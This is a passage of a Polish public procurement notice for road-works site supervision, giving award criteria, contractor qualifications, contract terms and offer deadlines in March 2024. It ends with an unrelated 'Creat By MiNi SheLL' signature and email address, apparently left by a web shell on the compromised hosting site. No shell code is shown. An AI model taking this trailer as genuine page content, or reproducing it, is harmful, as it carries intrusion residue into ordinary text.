class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby pełniącej funkcje inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4) Warunek : Zdolność techniczna lub zawodowa<br/>4.1. Warunek zostanie spełniony jeżeli Wykonawca wykaże: usługi wykonane, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywane, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, tj. co najmniej jedną usługę nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej o wartości nie mniejszej niż 50 000,00 zł brutto (słownie: pięćdziesiąt tysięcy złotych brutto) nad realizacją inwestycji dotyczącej wykonania robót budowlanych obejmujących budowę lub rozbudowę lub odbudowę lub przebudowę lub remont drogi wraz z chodnikami; wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>4.2. Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje jedną osobą:<br/>- posiadającą odpowiednie uprawnienia do kierowania i nadzorowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń, oraz<br/>- doświadczenie polegające na sprawowaniu funkcji inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej przy realizacji jednej zakończonej roboty budowlanej obejmującej budowę lub rozbudowę lub odbudowę lub przebudowę lub remont dróg wraz z chodnikami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający przewidział szczegółowo w paragrafach 10, 11 i 11A wzoru umowy - załączniku nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że (zgodnie z zapisami SWZ) z postępowania o udzielenie zamówienia wykluczy Wykonawcę na podstawie:<br/>- art. 108 ust. 1 ustawy Prawo zamówień publicznych,<br/>- art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego .<br/><br/>Zamawiający przewiduje możliwość uczestniczenia w wizji lokalnej. Wizja lokalna odbędzie się w dniu 29 luty 2024 r., o godz. 11:00.<br/><br/>W ramach niniejszego postępowania Wykonawca składa dokumenty i oświadczenia wymagane w SWZ, w tym między innymi: Załącznik nr 1 do SWZ - Formularz ofertowy Wykonawcy, Załącznik nr 2 do SWZ - Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, Załącznik nr 2.1 do SWZ - Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy), Załącznik nr 2.2 do SWZ - Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Prawo zamówień publicznych, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Załącznik nr 2.3 do SWZ - Wykaz usług, Załącznik nr 2.4 do SWZ - Wykaz osób, Załącznik nr 3 do SWZ - Oświadczenie o zobowiązaniu podmiotu oddającego do dyspozycji Wykonawcy niezbędne zasoby na potrzeby realizacji zamówienia (jeżeli dotyczy) oraz wszelkie inne dokumenty wymagane SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com